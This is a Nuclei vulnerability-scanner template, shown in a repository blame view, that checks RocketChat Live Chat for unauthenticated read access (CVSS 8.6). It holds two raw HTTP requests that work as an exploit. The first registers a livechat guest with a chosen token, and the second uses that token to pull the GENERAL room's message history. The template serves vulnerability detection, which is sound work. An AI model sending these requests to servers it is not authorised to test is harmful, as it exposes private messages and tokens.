nuclei-templates/vulnerabilities/rocketchat/unauth-message-read.yaml

51 lines
1.7 KiB
YAML
Raw Normal View History

2021-09-19 23:23:22 +00:00
id: rocketchat-unauth-access
2021-03-29 11:35:11 +00:00
2021-03-29 06:42:11 +00:00
info:
name: RocketChat Live Chat - Unauthenticated Read Access
2021-03-29 06:42:11 +00:00
author: rojanrijal
severity: high
description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens.
reference:
- https://docs.rocket.chat/guides/security/security-updates
2022-06-01 11:44:10 +00:00
- https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-522
remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8.
2021-09-19 23:23:22 +00:00
tags: rocketchat,unauth
2021-03-29 06:42:11 +00:00
requests:
- raw:
- |
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
{"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"}
- |
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}
matchers-condition: and
matchers:
2022-06-01 13:21:48 +00:00
2021-03-29 06:42:11 +00:00
- type: word
2022-06-01 13:21:48 +00:00
part: body
2021-03-29 06:42:11 +00:00
words:
2021-03-29 11:35:11 +00:00
- '"{\"msg\":\"result\",\"result\":{\"messages\"'
- '"success":true'
condition: and
2022-06-01 13:21:48 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/06/03